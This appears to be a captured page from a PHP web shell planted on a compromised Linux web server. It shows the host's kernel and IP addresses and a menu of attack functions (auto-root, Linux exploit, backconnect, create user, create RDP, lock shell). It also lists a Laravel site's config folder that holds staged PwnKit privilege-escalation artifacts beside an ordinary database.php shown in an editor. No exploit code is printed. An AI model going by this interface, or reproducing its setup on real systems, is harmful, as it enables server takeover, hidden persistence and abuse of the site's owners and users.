Linux server1.signalhg.team 4.18.0-553.134.1.el8_10.x86_64 #1 SMP Tue Jun 16 16:05:57 EDT 2026 x86_64
Apache
: 209.74.80.147 | : 216.73.216.164
150 Domain
8.1.34
signgwph
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
home /
signgwph /
signaltechdemo5.com /
config /
[ HOME SHELL ]
Name
Size
Permission
Action
.pkexec
[ DIR ]
drwxr-xr-x
GCONV_PATH=.
[ DIR ]
drwxr-xr-x
iosCertificates
[ DIR ]
drwxr-xr-x
.mad-root
0
B
-rw-r--r--
api.php
1.03
KB
-rw-r--r--
app.php
10.93
KB
-rw-r--r--
auth.php
3.74
KB
-rw-r--r--
backup.php
9.11
KB
-rw-r--r--
broadcasting.php
2.21
KB
-rw-r--r--
cache.php
3.07
KB
-rw-r--r--
cashier.php
4.96
KB
-rw-r--r--
cors.php
1.09
KB
-rw-r--r--
database.php
4.99
KB
-rw-r--r--
datatables-buttons.php
2.22
KB
-rw-r--r--
datatables-html.php
719
B
-rw-r--r--
debugbar.php
8.49
KB
-rw-r--r--
dompdf.php
11.14
KB
-rw-r--r--
entrust.php
5.13
KB
-rw-r--r--
entrust_seeder.php
560
B
-rw-r--r--
error_log
15.56
KB
-rw-r--r--
excel.php
11.97
KB
-rw-r--r--
filesystems.php
4.49
KB
-rw-r--r--
flutterwave.php
749
B
-rw-r--r--
fortify.php
4.74
KB
-rw-r--r--
froiden_envato.php
1.79
KB
-rw-r--r--
goat1.php
143.87
KB
-rw-r--r--
hashing.php
1.53
KB
-rw-r--r--
imap.php
7.79
KB
-rw-r--r--
installer.php
1.29
KB
-rw-r--r--
laravel-device-tracking.php
785
B
-rw-r--r--
laravel_google_translate.php
552
B
-rw-r--r--
location.php
3.59
KB
-rw-r--r--
log-viewer.php
7.05
KB
-rw-r--r--
logcleaner.php
907
B
-rw-r--r--
logging.php
2.93
KB
-rw-r--r--
mail.php
3.45
KB
-rw-r--r--
modules.php
10.41
KB
-rw-r--r--
mollie.php
1.93
KB
-rw-r--r--
onesignal.php
537
B
-rw-r--r--
payfast.php
1.37
KB
-rw-r--r--
paystack.php
724
B
-rw-r--r--
pushnotification.php
530
B
-rw-r--r--
pwnkit
10.99
KB
-rwxr-xr-x
queue.php
3.37
KB
-rw-r--r--
sanctum.php
2.24
KB
-rw-r--r--
sentry.php
1.7
KB
-rw-r--r--
services.php
3.07
KB
-rw-r--r--
session.php
6.88
KB
-rw-r--r--
translation-manager.php
1.45
KB
-rw-r--r--
view.php
1.03
KB
-rw-r--r--
xss_ignore.php
461
B
-rw-r--r--
zoom.php
443
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : database.php
<?php use Illuminate\Support\Str; return [ /* |-------------------------------------------------------------------------- | Default Database Connection Name |-------------------------------------------------------------------------- | | Here you may specify which of the database connections below you wish | to use as your default connection for all database work. Of course | you may use many connections at once using the Database library. | */ 'default' => env('DB_CONNECTION', 'mysql'), /* |-------------------------------------------------------------------------- | Database Connections |-------------------------------------------------------------------------- | | Here are each of the database connections setup for your application. | Of course, examples of configuring each database platform that is | supported by Laravel is shown below to make development simple. | | | All database work in Laravel is done through the PHP PDO facilities | so make sure you have the driver for your particular database of | choice installed on your machine before you begin development. | */ 'connections' => [ 'sqlite' => [ 'driver' => 'sqlite', 'url' => env('DATABASE_URL'), 'database' => env('DB_DATABASE', database_path('database.sqlite')), 'prefix' => '', 'foreign_key_constraints' => env('DB_FOREIGN_KEYS', true), ], 'mysql' => [ 'driver' => 'mysql', 'url' => env('DATABASE_URL'), 'host' => env('DB_HOST', '127.0.0.1'), 'port' => env('DB_PORT', '3306'), 'database' => env('DB_DATABASE', 'forge'), 'username' => env('DB_USERNAME', 'forge'), 'password' => env('DB_PASSWORD', ''), 'unix_socket' => env('DB_SOCKET', ''), 'charset' => 'utf8mb4', 'collation' => 'utf8mb4_unicode_ci', 'prefix' => '', 'prefix_indexes' => true, 'strict' => false, 'engine' => 'InnoDB', 'options' => extension_loaded('pdo_mysql') ? array_filter([ PDO::MYSQL_ATTR_SSL_CA => env('MYSQL_ATTR_SSL_CA'), PDO::ATTR_EMULATE_PREPARES => true ]) : [], ], 'pgsql' => [ 'driver' => 'pgsql', 'url' => env('DATABASE_URL'), 'host' => env('DB_HOST', '127.0.0.1'), 'port' => env('DB_PORT', '5432'), 'database' => env('DB_DATABASE', 'forge'), 'username' => env('DB_USERNAME', 'forge'), 'password' => env('DB_PASSWORD', ''), 'charset' => 'utf8', 'prefix' => '', 'prefix_indexes' => true, 'schema' => 'public', 'sslmode' => 'prefer', ], 'sqlsrv' => [ 'driver' => 'sqlsrv', 'url' => env('DATABASE_URL'), 'host' => env('DB_HOST', 'localhost'), 'port' => env('DB_PORT', '1433'), 'database' => env('DB_DATABASE', 'forge'), 'username' => env('DB_USERNAME', 'forge'), 'password' => env('DB_PASSWORD', ''), 'charset' => 'utf8', 'prefix' => '', 'prefix_indexes' => true, ], ], /* |-------------------------------------------------------------------------- | Migration Repository Table |-------------------------------------------------------------------------- | | This table keeps track of all the migrations that have already run for | your application. Using this information, we can determine which of | the migrations on disk haven't actually been run in the database. | */ 'migrations' => 'migrations', /* |-------------------------------------------------------------------------- | Redis Databases |-------------------------------------------------------------------------- | | Redis is an open source, fast, and advanced key-value store that also | provides a richer body of commands than a typical key-value system | such as APC or Memcached. Laravel makes it easy to dig right in. | */ 'redis' => [ 'client' => env('REDIS_CLIENT', 'phpredis'), 'options' => [ 'cluster' => env('REDIS_CLUSTER', 'redis'), 'prefix' => env('REDIS_PREFIX', Str::slug(env('APP_NAME', 'laravel'), '_').'_database_'), ], 'default' => [ 'url' => env('REDIS_URL'), 'host' => env('REDIS_HOST', '127.0.0.1'), 'password' => env('REDIS_PASSWORD', null), 'port' => env('REDIS_PORT', '6379'), 'database' => env('REDIS_DB', '0'), ], 'cache' => [ 'url' => env('REDIS_URL'), 'host' => env('REDIS_HOST', '127.0.0.1'), 'password' => env('REDIS_PASSWORD', null), 'port' => env('REDIS_PORT', '6379'), 'database' => env('REDIS_CACHE_DB', '1'), ], ], ];
Close